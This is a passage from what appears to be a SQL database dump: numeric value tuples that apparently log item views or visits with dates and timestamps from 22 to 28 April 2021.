22:57:47'),(19656,1594,1,'2021-04-22','2021-04-22 23:38:41'),(19657,3698,1,'2021-04-23','2021-04-23 05:49:20'),(19658,2769,1,'2021-04-23','2021-04-23 07:10:24'),(19659,2751,1,'2021-04-23','2021-04-23 07:19:06'),(19660,487,1,'2021-04-23','2021-04-23 08:22:19'),(19661,1606,1,'2021-04-23','2021-04-23 08:50:27'),(19662,1612,1,'2021-04-23','2021-04-23 09:35:36'),(19663,3102,1,'2021-04-23','2021-04-23 09:56:33'),(19664,1586,1,'2021-04-23','2021-04-23 10:01:44'),(19665,1602,1,'2021-04-23','2021-04-23 10:08:31'),(19666,1582,1,'2021-04-23','2021-04-23 10:09:33'),(19667,1602,1,'2021-04-23','2021-04-23 11:34:54'),(19668,91,1,'2021-04-23','2021-04-23 11:35:06'),(19669,1602,1,'2021-04-23','2021-04-23 11:35:34'),(19670,1728,1,'2021-04-23','2021-04-23 11:36:03'),(19671,1614,1,'2021-04-23','2021-04-23 13:18:19'),(19672,3005,1,'2021-04-23','2021-04-23 13:46:22'),(19673,1614,1,'2021-04-23','2021-04-23 14:09:24'),(19674,3541,1,'2021-04-23','2021-04-23 14:40:23'),(19675,3229,1,'2021-04-23','2021-04-23 14:41:39'),(19676,3541,1,'2021-04-23','2021-04-23 14:43:00'),(19677,1588,1,'2021-04-23','2021-04-23 15:00:47'),(19678,1614,1,'2021-04-23','2021-04-23 15:45:52'),(19679,1614,1,'2021-04-23','2021-04-23 15:51:12'),(19680,1614,1,'2021-04-23','2021-04-23 15:52:45'),(19681,1614,1,'2021-04-23','2021-04-23 15:53:19'),(19682,3706,1,'2021-04-23','2021-04-23 16:18:28'),(19683,1586,1,'2021-04-23','2021-04-23 16:56:03'),(19684,1586,1,'2021-04-23','2021-04-23 16:56:17'),(19685,1582,1,'2021-04-23','2021-04-23 17:31:34'),(19686,1582,1,'2021-04-23','2021-04-23 17:31:35'),(19687,1582,1,'2021-04-23','2021-04-23 17:32:00'),(19688,2159,1,'2021-04-23','2021-04-23 18:05:43'),(19689,2159,1,'2021-04-23','2021-04-23 18:09:26'),(19690,1606,1,'2021-04-23','2021-04-23 19:29:56'),(19691,1582,1,'2021-04-23','2021-04-23 19:30:01'),(19692,80,1,'2021-04-23','2021-04-23 19:31:42'),(19693,1606,1,'2021-04-23','2021-04-23 19:34:14'),(19694,1598,1,'2021-04-23','2021-04-23 19:50:05'),(19695,1606,1,'2021-04-23','2021-04-23 20:20:55'),(19696,108,1,'2021-04-23','2021-04-23 21:09:48'),(19697,2609,1,'2021-04-23','2021-04-23 22:22:33'),(19698,570,1,'2021-04-23','2021-04-23 22:55:41'),(19699,1594,1,'2021-04-23','2021-04-23 23:45:12'),(19700,1582,1,'2021-04-23','2021-04-23 23:48:38'),(19701,1582,1,'2021-04-23','2021-04-23 23:49:13'),(19702,1582,1,'2021-04-23','2021-04-23 23:51:20'),(19703,1582,1,'2021-04-23','2021-04-23 23:51:54'),(19704,1582,1,'2021-04-23','2021-04-23 23:52:20'),(19705,1582,1,'2021-04-23','2021-04-23 23:54:24'),(19706,1582,1,'2021-04-23','2021-04-23 23:54:51'),(19707,1582,1,'2021-04-23','2021-04-23 23:57:49'),(19708,1602,1,'2021-04-24','2021-04-24 00:23:16'),(19709,2297,1,'2021-04-24','2021-04-24 01:35:38'),(19710,3030,1,'2021-04-24','2021-04-24 01:42:34'),(19711,2748,1,'2021-04-24','2021-04-24 01:45:45'),(19712,1586,1,'2021-04-24','2021-04-24 02:36:15'),(19713,1602,1,'2021-04-24','2021-04-24 02:42:16'),(19714,91,1,'2021-04-24','2021-04-24 02:42:25'),(19715,87,1,'2021-04-24','2021-04-24 02:43:12'),(19716,474,1,'2021-04-24','2021-04-24 02:43:33'),(19717,87,1,'2021-04-24','2021-04-24 02:43:43'),(19718,1602,1,'2021-04-24','2021-04-24 02:44:41'),(19719,1602,1,'2021-04-24','2021-04-24 02:46:31'),(19720,72,1,'2021-04-24','2021-04-24 02:53:22'),(19721,1602,1,'2021-04-24','2021-04-24 02:53:42'),(19722,1582,1,'2021-04-24','2021-04-24 05:36:17'),(19723,1594,1,'2021-04-24','2021-04-24 06:25:34'),(19724,1594,1,'2021-04-24','2021-04-24 06:25:36'),(19725,2804,1,'2021-04-24','2021-04-24 06:29:03'),(19726,1594,1,'2021-04-24','2021-04-24 06:36:52'),(19727,1598,1,'2021-04-24','2021-04-24 06:37:17'),(19728,2154,1,'2021-04-24','2021-04-24 07:06:37'),(19729,1582,1,'2021-04-24','2021-04-24 07:13:40'),(19730,1602,1,'2021-04-24','2021-04-24 07:18:26'),(19731,487,1,'2021-04-24','2021-04-24 07:20:36'),(19732,1600,1,'2021-04-24','2021-04-24 08:04:57'),(19733,91,1,'2021-04-24','2021-04-24 08:05:25'),(19734,1745,1,'2021-04-24','2021-04-24 08:06:03'),(19735,1592,1,'2021-04-24','2021-04-24 08:16:54'),(19736,1592,1,'2021-04-24','2021-04-24 08:23:09'),(19737,68,1,'2021-04-24','2021-04-24 08:23:42'),(19738,76,1,'2021-04-24','2021-04-24 08:24:20'),(19739,76,1,'2021-04-24','2021-04-24 08:25:24'),(19740,68,1,'2021-04-24','2021-04-24 08:25:33'),(19741,1592,1,'2021-04-24','2021-04-24 08:28:14'),(19742,1606,1,'2021-04-24','2021-04-24 08:31:53'),(19743,484,1,'2021-04-24','2021-04-24 09:04:23'),(19744,91,1,'2021-04-24','2021-04-24 09:05:02'),(19745,1594,1,'2021-04-24','2021-04-24 09:08:38'),(19746,1592,1,'2021-04-24','2021-04-24 09:10:08'),(19747,484,1,'2021-04-24','2021-04-24 09:10:37'),(19748,1745,1,'2021-04-24','2021-04-24 10:20:11'),(19749,1770,1,'2021-04-24','2021-04-24 10:41:04'),(19750,1745,1,'2021-04-24','2021-04-24 10:52:05'),(19751,1594,1,'2021-04-24','2021-04-24 11:06:26'),(19752,2309,1,'2021-04-24','2021-04-24 11:21:28'),(19753,1600,1,'2021-04-24','2021-04-24 12:21:45'),(19754,1594,1,'2021-04-24','2021-04-24 13:05:08'),(19755,1726,1,'2021-04-24','2021-04-24 13:19:58'),(19756,2248,1,'2021-04-24','2021-04-24 14:08:34'),(19757,2248,1,'2021-04-24','2021-04-24 14:10:31'),(19758,2248,1,'2021-04-24','2021-04-24 14:17:21'),(19759,80,1,'2021-04-24','2021-04-24 14:27:47'),(19760,3030,1,'2021-04-24','2021-04-24 15:27:19'),(19761,487,1,'2021-04-24','2021-04-24 15:40:10'),(19762,1594,1,'2021-04-24','2021-04-24 15:48:40'),(19763,1768,1,'2021-04-24','2021-04-24 16:10:40'),(19764,1592,1,'2021-04-24','2021-04-24 17:03:56'),(19765,1592,1,'2021-04-24','2021-04-24 17:03:58'),(19766,1592,1,'2021-04-24','2021-04-24 17:05:08'),(19767,2991,1,'2021-04-24','2021-04-24 17:20:49'),(19768,3102,1,'2021-04-24','2021-04-24 17:30:52'),(19769,1734,1,'2021-04-24','2021-04-24 19:01:10'),(19770,2748,1,'2021-04-24','2021-04-24 20:51:31'),(19771,1724,1,'2021-04-24','2021-04-24 21:12:26'),(19772,1713,1,'2021-04-24','2021-04-24 22:01:54'),(19773,2503,1,'2021-04-24','2021-04-24 22:42:02'),(19774,2152,1,'2021-04-24','2021-04-24 23:52:19'),(19775,1602,1,'2021-04-25','2021-04-25 00:05:38'),(19776,2293,1,'2021-04-25','2021-04-25 00:22:32'),(19777,3180,1,'2021-04-25','2021-04-25 01:02:39'),(19778,467,1,'2021-04-25','2021-04-25 02:52:30'),(19779,570,1,'2021-04-25','2021-04-25 03:29:19'),(19780,1602,1,'2021-04-25','2021-04-25 06:33:51'),(19781,487,1,'2021-04-25','2021-04-25 07:24:37'),(19782,1606,1,'2021-04-25','2021-04-25 07:34:40'),(19783,570,1,'2021-04-25','2021-04-25 07:56:13'),(19784,91,1,'2021-04-25','2021-04-25 08:06:28'),(19785,3486,1,'2021-04-25','2021-04-25 08:07:43'),(19786,3045,1,'2021-04-25','2021-04-25 08:07:58'),(19787,1594,1,'2021-04-25','2021-04-25 09:05:26'),(19788,1586,1,'2021-04-25','2021-04-25 10:18:39'),(19789,1778,1,'2021-04-25','2021-04-25 10:39:37'),(19790,1600,1,'2021-04-25','2021-04-25 12:07:01'),(19791,2457,1,'2021-04-25','2021-04-25 13:04:03'),(19792,2769,1,'2021-04-25','2021-04-25 14:02:01'),(19793,2769,1,'2021-04-25','2021-04-25 14:02:03'),(19794,2457,1,'2021-04-25','2021-04-25 14:05:48'),(19795,2309,1,'2021-04-25','2021-04-25 14:27:35'),(19796,2159,1,'2021-04-25','2021-04-25 14:46:30'),(19797,1604,1,'2021-04-25','2021-04-25 14:48:24'),(19798,1604,1,'2021-04-25','2021-04-25 15:57:15'),(19799,1586,1,'2021-04-25','2021-04-25 16:09:30'),(19800,1586,1,'2021-04-25','2021-04-25 16:09:31'),(19801,1586,1,'2021-04-25','2021-04-25 16:09:35'),(19802,1586,1,'2021-04-25','2021-04-25 16:13:00'),(19803,2617,1,'2021-04-25','2021-04-25 16:14:06'),(19804,469,1,'2021-04-25','2021-04-25 16:15:01'),(19805,2558,1,'2021-04-25','2021-04-25 16:15:38'),(19806,2617,1,'2021-04-25','2021-04-25 16:17:03'),(19807,1586,1,'2021-04-25','2021-04-25 16:17:21'),(19808,2150,1,'2021-04-25','2021-04-25 16:18:09'),(19809,1586,1,'2021-04-25','2021-04-25 16:18:16'),(19810,1713,1,'2021-04-25','2021-04-25 16:18:41'),(19811,1720,1,'2021-04-25','2021-04-25 16:19:02'),(19812,1720,1,'2021-04-25','2021-04-25 16:19:28'),(19813,1713,1,'2021-04-25','2021-04-25 16:19:34'),(19814,1586,1,'2021-04-25','2021-04-25 16:19:42'),(19815,2150,1,'2021-04-25','2021-04-25 16:20:19'),(19816,1586,1,'2021-04-25','2021-04-25 16:20:39'),(19817,1697,1,'2021-04-25','2021-04-25 16:20:59'),(19818,1586,1,'2021-04-25','2021-04-25 16:23:56'),(19819,1699,1,'2021-04-25','2021-04-25 16:24:16'),(19820,1586,1,'2021-04-25','2021-04-25 16:25:39'),(19821,2769,1,'2021-04-25','2021-04-25 16:46:12'),(19822,1602,1,'2021-04-25','2021-04-25 16:48:11'),(19823,469,1,'2021-04-25','2021-04-25 16:56:09'),(19824,471,1,'2021-04-25','2021-04-25 16:56:29'),(19825,469,1,'2021-04-25','2021-04-25 16:56:41'),(19826,1598,1,'2021-04-25','2021-04-25 17:28:57'),(19827,1598,1,'2021-04-25','2021-04-25 17:29:03'),(19828,467,1,'2021-04-25','2021-04-25 17:38:11'),(19829,1588,1,'2021-04-25','2021-04-25 17:38:49'),(19830,1606,1,'2021-04-25','2021-04-25 17:40:20'),(19831,1600,1,'2021-04-25','2021-04-25 19:29:07'),(19832,1586,1,'2021-04-25','2021-04-25 19:49:54'),(19833,2769,1,'2021-04-25','2021-04-25 19:59:56'),(19834,1586,1,'2021-04-25','2021-04-25 20:10:17'),(19835,1586,1,'2021-04-25','2021-04-25 21:02:24'),(19836,1586,1,'2021-04-25','2021-04-25 21:02:27'),(19837,1586,1,'2021-04-25','2021-04-25 21:02:28'),(19838,1586,1,'2021-04-25','2021-04-25 21:02:31'),(19839,1586,1,'2021-04-25','2021-04-25 21:03:19'),(19840,1608,1,'2021-04-25','2021-04-25 21:03:49'),(19841,2989,1,'2021-04-25','2021-04-25 21:22:13'),(19842,2769,1,'2021-04-25','2021-04-25 21:50:41'),(19843,1594,1,'2021-04-25','2021-04-25 21:59:52'),(19844,1594,1,'2021-04-25','2021-04-25 22:00:11'),(19845,3282,1,'2021-04-25','2021-04-25 22:03:49'),(19846,2904,1,'2021-04-25','2021-04-25 22:07:52'),(19847,570,1,'2021-04-25','2021-04-25 22:09:35'),(19848,91,1,'2021-04-25','2021-04-25 22:10:22'),(19849,1586,1,'2021-04-25','2021-04-25 22:12:28'),(19850,1586,1,'2021-04-25','2021-04-25 22:16:34'),(19851,1586,1,'2021-04-25','2021-04-25 22:20:22'),(19852,1586,1,'2021-04-25','2021-04-25 22:21:01'),(19853,1699,1,'2021-04-25','2021-04-25 22:21:29'),(19854,1586,1,'2021-04-25','2021-04-25 22:22:35'),(19855,3261,1,'2021-04-25','2021-04-25 22:33:48'),(19856,1586,1,'2021-04-25','2021-04-25 22:40:06'),(19857,1586,1,'2021-04-25','2021-04-25 22:47:31'),(19858,487,1,'2021-04-25','2021-04-25 23:10:01'),(19859,2704,1,'2021-04-25','2021-04-25 23:19:14'),(19860,2161,1,'2021-04-25','2021-04-25 23:26:48'),(19861,1586,1,'2021-04-25','2021-04-25 23:33:46'),(19862,80,1,'2021-04-25','2021-04-25 23:50:14'),(19863,1598,1,'2021-04-25','2021-04-25 23:56:09'),(19864,2457,1,'2021-04-25','2021-04-25 23:56:47'),(19865,1586,1,'2021-04-26','2021-04-26 00:09:20'),(19866,1596,1,'2021-04-26','2021-04-26 00:51:48'),(19867,2309,1,'2021-04-26','2021-04-26 01:20:34'),(19868,2748,1,'2021-04-26','2021-04-26 01:30:33'),(19869,3664,1,'2021-04-26','2021-04-26 03:01:52'),(19870,1598,1,'2021-04-26','2021-04-26 03:12:16'),(19871,468,1,'2021-04-26','2021-04-26 03:25:03'),(19872,467,1,'2021-04-26','2021-04-26 04:01:52'),(19873,1768,1,'2021-04-26','2021-04-26 04:31:44'),(19874,1697,1,'2021-04-26','2021-04-26 05:32:21'),(19875,108,1,'2021-04-26','2021-04-26 05:42:11'),(19876,2457,1,'2021-04-26','2021-04-26 06:24:39'),(19877,2159,1,'2021-04-26','2021-04-26 07:27:47'),(19878,2457,1,'2021-04-26','2021-04-26 07:44:20'),(19879,3261,1,'2021-04-26','2021-04-26 07:48:54'),(19880,1602,1,'2021-04-26','2021-04-26 08:11:46'),(19881,1594,1,'2021-04-26','2021-04-26 08:43:34'),(19882,2161,1,'2021-04-26','2021-04-26 08:44:15'),(19883,3079,1,'2021-04-26','2021-04-26 09:00:59'),(19884,3261,1,'2021-04-26','2021-04-26 09:04:15'),(19885,1594,1,'2021-04-26','2021-04-26 09:05:39'),(19886,2457,1,'2021-04-26','2021-04-26 09:15:56'),(19887,480,1,'2021-04-26','2021-04-26 09:19:10'),(19888,3265,1,'2021-04-26','2021-04-26 09:30:56'),(19889,472,1,'2021-04-26','2021-04-26 09:34:11'),(19890,2457,1,'2021-04-26','2021-04-26 10:00:56'),(19891,2309,1,'2021-04-26','2021-04-26 10:24:40'),(19892,1602,1,'2021-04-26','2021-04-26 10:29:37'),(19893,3055,1,'2021-04-26','2021-04-26 10:30:59'),(19894,1602,1,'2021-04-26','2021-04-26 10:33:44'),(19895,2704,1,'2021-04-26','2021-04-26 10:47:52'),(19896,1602,1,'2021-04-26','2021-04-26 10:51:47'),(19897,472,1,'2021-04-26','2021-04-26 11:10:21'),(19898,1602,1,'2021-04-26','2021-04-26 11:20:11'),(19899,1594,1,'2021-04-26','2021-04-26 11:21:50'),(19900,2159,1,'2021-04-26','2021-04-26 11:22:18'),(19901,3038,1,'2021-04-26','2021-04-26 11:35:19'),(19902,2609,1,'2021-04-26','2021-04-26 11:37:51'),(19903,1600,1,'2021-04-26','2021-04-26 11:39:39'),(19904,1745,1,'2021-04-26','2021-04-26 11:41:57'),(19905,1600,1,'2021-04-26','2021-04-26 11:48:51'),(19906,1724,1,'2021-04-26','2021-04-26 11:49:12'),(19907,1602,1,'2021-04-26','2021-04-26 12:17:05'),(19908,1604,1,'2021-04-26','2021-04-26 12:38:43'),(19909,1586,1,'2021-04-26','2021-04-26 12:58:49'),(19910,3030,1,'2021-04-26','2021-04-26 13:00:38'),(19911,1602,1,'2021-04-26','2021-04-26 13:01:29'),(19912,1604,1,'2021-04-26','2021-04-26 13:08:34'),(19913,1602,1,'2021-04-26','2021-04-26 13:13:43'),(19914,3280,1,'2021-04-26','2021-04-26 13:17:49'),(19915,1612,1,'2021-04-26','2021-04-26 13:28:38'),(19916,80,1,'2021-04-26','2021-04-26 13:31:27'),(19917,80,1,'2021-04-26','2021-04-26 13:32:40'),(19918,80,1,'2021-04-26','2021-04-26 13:34:54'),(19919,80,1,'2021-04-26','2021-04-26 13:35:17'),(19920,1594,1,'2021-04-26','2021-04-26 13:40:07'),(19921,80,1,'2021-04-26','2021-04-26 13:46:51'),(19922,3056,1,'2021-04-26','2021-04-26 13:53:11'),(19923,1612,1,'2021-04-26','2021-04-26 14:13:36'),(19924,1612,1,'2021-04-26','2021-04-26 14:16:04'),(19925,80,1,'2021-04-26','2021-04-26 14:16:37'),(19926,1594,1,'2021-04-26','2021-04-26 14:31:26'),(19927,91,1,'2021-04-26','2021-04-26 14:31:48'),(19928,1586,1,'2021-04-26','2021-04-26 15:07:01'),(19929,3107,1,'2021-04-26','2021-04-26 15:07:37'),(19930,1715,1,'2021-04-26','2021-04-26 15:23:11'),(19931,1594,1,'2021-04-26','2021-04-26 15:38:45'),(19932,1602,1,'2021-04-26','2021-04-26 15:45:01'),(19933,1594,1,'2021-04-26','2021-04-26 15:50:50'),(19934,80,1,'2021-04-26','2021-04-26 15:54:23'),(19935,80,1,'2021-04-26','2021-04-26 15:59:50'),(19936,1614,1,'2021-04-26','2021-04-26 16:01:22'),(19937,2457,1,'2021-04-26','2021-04-26 16:02:00'),(19938,1614,1,'2021-04-26','2021-04-26 16:02:22'),(19939,80,1,'2021-04-26','2021-04-26 16:09:51'),(19940,1594,1,'2021-04-26','2021-04-26 16:09:57'),(19941,2911,1,'2021-04-26','2021-04-26 16:31:34'),(19942,467,1,'2021-04-26','2021-04-26 17:30:29'),(19943,1604,1,'2021-04-26','2021-04-26 17:36:17'),(19944,91,1,'2021-04-26','2021-04-26 17:37:02'),(19945,1604,1,'2021-04-26','2021-04-26 17:37:16'),(19946,91,1,'2021-04-26','2021-04-26 17:38:36'),(19947,76,1,'2021-04-26','2021-04-26 17:41:38'),(19948,91,1,'2021-04-26','2021-04-26 17:41:58'),(19949,1604,1,'2021-04-26','2021-04-26 17:43:10'),(19950,80,1,'2021-04-26','2021-04-26 17:43:17'),(19951,1604,1,'2021-04-26','2021-04-26 17:47:20'),(19952,1604,1,'2021-04-26','2021-04-26 17:47:59'),(19953,76,1,'2021-04-26','2021-04-26 17:48:19'),(19954,1604,1,'2021-04-26','2021-04-26 17:48:45'),(19955,1594,1,'2021-04-26','2021-04-26 18:32:50'),(19956,1544,1,'2021-04-26','2021-04-26 18:33:33'),(19957,1606,1,'2021-04-26','2021-04-26 18:40:38'),(19958,3030,1,'2021-04-26','2021-04-26 18:50:56'),(19959,2309,1,'2021-04-26','2021-04-26 18:59:17'),(19960,487,1,'2021-04-26','2021-04-26 19:01:51'),(19961,1594,1,'2021-04-26','2021-04-26 19:30:52'),(19962,1606,1,'2021-04-26','2021-04-26 19:36:09'),(19963,84,1,'2021-04-26','2021-04-26 19:38:01'),(19964,1606,1,'2021-04-26','2021-04-26 19:38:25'),(19965,87,1,'2021-04-26','2021-04-26 19:38:35'),(19966,89,1,'2021-04-26','2021-04-26 19:38:51'),(19967,2309,1,'2021-04-26','2021-04-26 19:40:43'),(19968,87,1,'2021-04-26','2021-04-26 19:41:00'),(19969,3313,1,'2021-04-26','2021-04-26 20:21:02'),(19970,1594,1,'2021-04-26','2021-04-26 21:33:25'),(19971,1594,1,'2021-04-26','2021-04-26 21:33:45'),(19972,3229,1,'2021-04-26','2021-04-26 21:34:34'),(19973,1594,1,'2021-04-26','2021-04-26 21:37:27'),(19974,1582,1,'2021-04-26','2021-04-26 21:50:35'),(19975,479,1,'2021-04-26','2021-04-26 22:02:34'),(19976,1608,1,'2021-04-26','2021-04-26 22:07:47'),(19977,2063,1,'2021-04-26','2021-04-26 22:21:33'),(19978,1602,1,'2021-04-26','2021-04-26 22:34:56'),(19979,1594,1,'2021-04-26','2021-04-26 22:48:01'),(19980,2159,1,'2021-04-26','2021-04-26 23:00:59'),(19981,2457,1,'2021-04-26','2021-04-26 23:35:48'),(19982,1745,1,'2021-04-26','2021-04-26 23:41:29'),(19983,3247,1,'2021-04-26','2021-04-26 23:51:57'),(19984,1739,1,'2021-04-27','2021-04-27 01:31:52'),(19985,467,1,'2021-04-27','2021-04-27 02:23:25'),(19986,2248,1,'2021-04-27','2021-04-27 03:32:44'),(19987,3229,1,'2021-04-27','2021-04-27 05:12:49'),(19988,3056,1,'2021-04-27','2021-04-27 05:54:40'),(19989,87,1,'2021-04-27','2021-04-27 06:24:18'),(19990,2161,1,'2021-04-27','2021-04-27 07:35:38'),(19991,1782,1,'2021-04-27','2021-04-27 08:03:21'),(19992,2159,1,'2021-04-27','2021-04-27 08:07:36'),(19993,2297,1,'2021-04-27','2021-04-27 08:13:31'),(19994,2457,1,'2021-04-27','2021-04-27 08:13:46'),(19995,87,1,'2021-04-27','2021-04-27 08:18:45'),(19996,2457,1,'2021-04-27','2021-04-27 08:19:42'),(19997,87,1,'2021-04-27','2021-04-27 08:19:55'),(19998,470,1,'2021-04-27','2021-04-27 08:20:36'),(19999,2457,1,'2021-04-27','2021-04-27 08:21:00'),(20000,3079,1,'2021-04-27','2021-04-27 08:35:58'),(20001,2159,1,'2021-04-27','2021-04-27 08:37:36'),(20002,3023,1,'2021-04-27','2021-04-27 08:48:31'),(20003,3664,1,'2021-04-27','2021-04-27 09:29:33'),(20004,480,1,'2021-04-27','2021-04-27 09:29:36'),(20005,486,1,'2021-04-27','2021-04-27 09:37:35'),(20006,2457,1,'2021-04-27','2021-04-27 09:47:39'),(20007,91,1,'2021-04-27','2021-04-27 09:50:32'),(20008,91,1,'2021-04-27','2021-04-27 09:50:46'),(20009,2457,1,'2021-04-27','2021-04-27 09:55:35'),(20010,1711,1,'2021-04-27','2021-04-27 09:56:01'),(20011,1711,1,'2021-04-27','2021-04-27 09:56:34'),(20012,1726,1,'2021-04-27','2021-04-27 09:59:43'),(20013,1592,1,'2021-04-27','2021-04-27 10:03:16'),(20014,3107,1,'2021-04-27','2021-04-27 10:12:48'),(20015,1726,1,'2021-04-27','2021-04-27 10:18:20'),(20016,487,1,'2021-04-27','2021-04-27 10:24:15'),(20017,469,1,'2021-04-27','2021-04-27 10:40:49'),(20018,1582,1,'2021-04-27','2021-04-27 10:49:05'),(20019,1728,1,'2021-04-27','2021-04-27 10:51:05'),(20020,2956,1,'2021-04-27','2021-04-27 11:14:22'),(20021,1602,1,'2021-04-27','2021-04-27 11:37:07'),(20022,1602,1,'2021-04-27','2021-04-27 11:56:09'),(20023,1602,1,'2021-04-27','2021-04-27 11:56:21'),(20024,1600,1,'2021-04-27','2021-04-27 12:03:29'),(20025,87,1,'2021-04-27','2021-04-27 12:06:00'),(20026,471,1,'2021-04-27','2021-04-27 12:09:13'),(20027,1586,1,'2021-04-27','2021-04-27 12:23:36'),(20028,1586,1,'2021-04-27','2021-04-27 12:23:54'),(20029,1612,1,'2021-04-27','2021-04-27 13:13:56'),(20030,2159,1,'2021-04-27','2021-04-27 13:21:19'),(20031,2309,1,'2021-04-27','2021-04-27 13:24:38'),(20032,1592,1,'2021-04-27','2021-04-27 13:28:51'),(20033,1608,1,'2021-04-27','2021-04-27 13:36:31'),(20034,1600,1,'2021-04-27','2021-04-27 13:37:52'),(20035,1600,1,'2021-04-27','2021-04-27 14:26:13'),(20036,467,1,'2021-04-27','2021-04-27 14:38:44'),(20037,1594,1,'2021-04-27','2021-04-27 15:04:13'),(20038,1594,1,'2021-04-27','2021-04-27 15:08:21'),(20039,3531,1,'2021-04-27','2021-04-27 15:39:32'),(20040,1592,1,'2021-04-27','2021-04-27 15:49:58'),(20041,3313,1,'2021-04-27','2021-04-27 15:56:41'),(20042,3531,1,'2021-04-27','2021-04-27 16:00:06'),(20043,1770,1,'2021-04-27','2021-04-27 16:00:20'),(20044,2809,1,'2021-04-27','2021-04-27 16:09:34'),(20045,1594,1,'2021-04-27','2021-04-27 16:10:08'),(20046,1594,1,'2021-04-27','2021-04-27 16:14:08'),(20047,1600,1,'2021-04-27','2021-04-27 16:29:04'),(20048,2159,1,'2021-04-27','2021-04-27 16:45:40'),(20049,1734,1,'2021-04-27','2021-04-27 17:05:39'),(20050,2159,1,'2021-04-27','2021-04-27 17:15:39'),(20051,80,1,'2021-04-27','2021-04-27 17:26:33'),(20052,1602,1,'2021-04-27','2021-04-27 17:34:31'),(20053,1602,1,'2021-04-27','2021-04-27 17:37:15'),(20054,1602,1,'2021-04-27','2021-04-27 17:37:23'),(20055,3092,1,'2021-04-27','2021-04-27 17:41:54'),(20056,3664,1,'2021-04-27','2021-04-27 17:45:47'),(20057,1586,1,'2021-04-27','2021-04-27 17:52:30'),(20058,1877,1,'2021-04-27','2021-04-27 17:54:39'),(20059,486,1,'2021-04-27','2021-04-27 18:15:46'),(20060,2150,1,'2021-04-27','2021-04-27 18:45:40'),(20061,2991,1,'2021-04-27','2021-04-27 18:48:11'),(20062,1584,1,'2021-04-27','2021-04-27 19:16:27'),(20063,1612,1,'2021-04-27','2021-04-27 19:34:17'),(20064,3104,1,'2021-04-27','2021-04-27 19:52:47'),(20065,91,1,'2021-04-27','2021-04-27 19:55:10'),(20066,2904,1,'2021-04-27','2021-04-27 19:56:58'),(20067,2904,1,'2021-04-27','2021-04-27 19:58:10'),(20068,2904,1,'2021-04-27','2021-04-27 19:58:29'),(20069,3104,1,'2021-04-27','2021-04-27 19:59:43'),(20070,2309,1,'2021-04-27','2021-04-27 20:56:55'),(20071,1602,1,'2021-04-27','2021-04-27 21:10:22'),(20072,1606,1,'2021-04-27','2021-04-27 21:20:34'),(20073,1586,1,'2021-04-27','2021-04-27 21:46:44'),(20074,1586,1,'2021-04-27','2021-04-27 22:00:15'),(20075,1602,1,'2021-04-27','2021-04-27 22:27:12'),(20076,1602,1,'2021-04-27','2021-04-27 22:31:00'),(20077,1747,1,'2021-04-27','2021-04-27 23:04:14'),(20078,3265,1,'2021-04-27','2021-04-27 23:17:40'),(20079,1602,1,'2021-04-27','2021-04-27 23:26:59'),(20080,1614,1,'2021-04-27','2021-04-27 23:30:41'),(20081,1602,1,'2021-04-27','2021-04-27 23:58:55'),(20082,1728,1,'2021-04-28','2021-04-28 00:00:30'),(20083,1602,1,'2021-04-28','2021-04-28 00:01:28'),(20084,3707,1,'2021-04-28','2021-04-28 00:03:49'),(20085,3680,1,'2021-04-28','2021-04-28 00:19:18'),(20086,76,1,'2021-04-28','2021-04-28 00:21:34'),(20087,1726,1,'2021-04-28','2021-04-28 00:24:08'),(20088,1602,1,'2021-04-28','2021-04-28 00:27:14'),(20089,467,1,'2021-04-28','2021-04-28 00:51:51'),(20090,1606,1,'2021-04-28','2021-04-28 00:55:45'),(20091,1602,1,'2021-04-28','2021-04-28 00:58:19'),(20092,3109,1,'2021-04-28','2021-04-28 01:06:05'),(20093,2809,1,'2021-04-28','2021-04-28 01:42:14'),(20094,1602,1,'2021-04-28','2021-04-28 02:13:42'),(20095,570,1,'2021-04-28','2021-04-28 02:32:51'),(20096,1604,1,'2021-04-28','2021-04-28 02:41:55'),(20097,1604,1,'2021-04-28','2021-04-28 02:41:57'),(20098,1718,1,'2021-04-28','2021-04-28 02:53:09'),(20099,467,1,'2021-04-28','2021-04-28 03:33:48'),(20100,3107,1,'2021-04-28','2021-04-28 04:11:26'),(20101,1602,1,'2021-04-28','2021-04-28 04:27:05'),(20102,3282,1,'2021-04-28','2021-04-28 04:44:41'),(20103,1586,1,'2021-04-28','2021-04-28 05:30:10'),(20104,2658,1,'2021-04-28','2021-04-28 05:39:30'),(20105,1604,1,'2021-04-28','2021-04-28 05:59:22'),(20106,2991,1,'2021-04-28','2021-04-28 06:02:36'),(20107,1602,1,'2021-04-28','2021-04-28 06:36:32'),(20108,1602,1,'2021-04-28','2021-04-28 06:44:45'),(20109,80,1,'2021-04-28','2021-04-28 06:50:47'),(20110,1602,1,'2021-04-28','2021-04-28 07:11:11'),(20111,1602,1,'2021-04-28','2021-04-28 07:11:23'),(20112,3498,1,'2021-04-28','2021-04-28 07:18:54'),(20113,1588,1,'2021-04-28','2021-04-28 07:39:43'),(20114,1602,1,'2021-04-28','2021-04-28 07:43:16'),(20115,1594,1,'2021-04-28','2021-04-28 08:13:06'),(20116,2309,1,'2021-04-28','2021-04-28 08:33:37'),(20117,1602,1,'2021-04-28','2021-04-28 08:53:50'),(20118,1612,1,'2021-04-28','2021-04-28 09:30:26'),(20119,2309,1,'2021-04-28','2021-04-28 09:50:29'),(20120,3107,1,'2021-04-28','2021-04-28 09:52:56'),(20121,1600,1,'2021-04-28','2021-04-28 10:00:26'),(20122,72,1,'2021-04-28','2021-04-28 10:31:02'),(20123,3706,1,'2021-04-28','2021-04-28 10:33:27'),(20124,1602,1,'2021-04-28','2021-04-28 10:49:20'),(20125,1602,1,'2021-04-28','2021-04-28 10:50:10'),(20126,1600,1,'2021-04-28','2021-04-28 10:51:05'),(20127,1602,1,'2021-04-28','2021-04-28 11:01:58'),(20128,1600,1,'2021-04-28','2021-04-28 11:39:43'),(20129,1728,1,'2021-04-28','2021-04-28 11:43:40'),(20130,3486,1,'2021-04-28','2021-04-28 11:51:25'),(20131,1598,1,'2021-04-28','2021-04-28 11:55:17'),(20132,3030,1,'2021-04-28','2021-04-28 12:00:30'),(20133,1594,1,'2021-04-28','2021-04-28 12:03:27'),(20134,80,1,'2021-04-28','2021-04-28 12:11:27'),(20135,1602,1,'2021-04-28','2021-04-28 12:49:55'),(20136,91,1,'2021-04-28','2021-04-28 13:16:43'),(20137,91,1,'2021-04-28','2021-04-28 13:17:40'),(20138,2934,1,'2021-04-28','2021-04-28 13:20:54'),(20139,1602,1,'2021-04-28','2021-04-28 13:46:30'),(20140,80,1,'2021-04-28','2021-04-28 13:48:06'),(20141,2395,1,'2021-04-28','2021-04-28 